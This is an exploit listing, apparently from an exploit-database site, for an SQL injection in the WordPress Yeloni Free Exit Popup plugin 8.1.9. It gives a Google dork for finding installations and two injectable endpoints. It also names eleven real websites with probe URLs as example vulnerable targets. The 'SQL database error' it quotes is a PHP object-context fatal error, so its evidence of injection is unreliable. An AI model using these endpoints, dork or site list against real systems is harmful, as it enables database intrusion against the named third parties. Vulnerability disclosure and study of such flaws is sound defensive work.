WordPress Yeloni Free Exit Popup Plugins 8.1.9 SQL Injection

2019.01.28
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

#################################################################### # Exploit Title : WordPress Yeloni Free Exit Popup Plugins 8.1.9 SQL Injection # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 28/01/2019 # Vendor Homepage : yeloni.com # Software Download Link : downloads.wordpress.org/plugin/yeloni-free-exit-popup.zip # Software Information Link : wordpress.org/plugins/yeloni-free-exit-popup/ # Software Version : 8.1.9 # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Google Dorks : inurl:''/wp-content/plugins/yeloni-free-exit-popup/wordpress/'' # Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] #################################################################### # Description : ************* * Yeloni is a powerful lead generation plugin that converts abandoning visitors on your website into subscribers using attention grabbing forms that are proven to convert. Choose from a wide variety of configurations, targetting options and widget designs to customize your popup. #################################################################### # Impact : ********** * WordPress Yeloni Free Exit Popup Plugins 8.1.9 and other versions is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. * Exploiting this issue could allow an attacker to compromise the application, read, access or modify data, or exploit latent vulnerabilities in the underlying database. If the webserver is misconfigured, read & write access to the filesystem may be possible. #################################################################### # SQL Injection Exploit : *********************** /wp-content/plugins/yeloni-free-exit-popup/wordpress/yetience_config.php?id=[SQL Injection] /wp-content/plugins/yeloni-free-exit-popup/wordpress/client-load.php?id=[SQL Injection] #################################################################### # Example Vulnerable Sites : *************************** [+] startadora.com/wp-content/plugins/yeloni-free-exit-popup/wordpress/yetience_config.php?id=1%27 [+] podfo.com/wp-content/plugins/yeloni-free-exit-popup/wordpress/yetience_config.php?id=1%27 [+] hviaonline.com/funds/wp-content/plugins/yeloni-free-exit-popup/wordpress/yetience_config.php?id=1%27 [+] interset.digital/site/wp-content/plugins/yeloni-free-exit-popup/wordpress/yetience_config.php?id=1%27 [+] speakerhead.com/wp-content/plugins/yeloni-free-exit-popup/wordpress/yetience_config.php?id=1%27 [+] sterlingequipmentinc.com/wp-content/plugins/yeloni-free-exit-popup/wordpress/yetience_config.php?id=1%27 [+] ewan.lublin.pl/wp-content/plugins/yeloni-free-exit-popup/wordpress/yetience_config.php?id=1%27 [+] thequadgroup.com/wp-content/plugins/yeloni-free-exit-popup/wordpress/yetience_config.php?id=1%27 [+] zenic.co.uk/wp-content/plugins/yeloni-free-exit-popup/wordpress/yetience_config.php?id=1%27 [+] englishxp.co.uk/wp-content/plugins/yeloni-free-exit-popup/wordpress/yetience_config.php?id=1%27 [+] rodoyo.com/wp-content/plugins/yeloni-free-exit-popup/wordpress/yetience_config.php?id=1%27 #################################################################### # Example SQL Database Error : ****************************** Fatal error: Using $this when not in object context in /home/axtvr/public_html /wp-content/plugins/yeloni-free-exit-popup/wordpress/yetience_config.php on line 2 #################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ####################################################################


Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top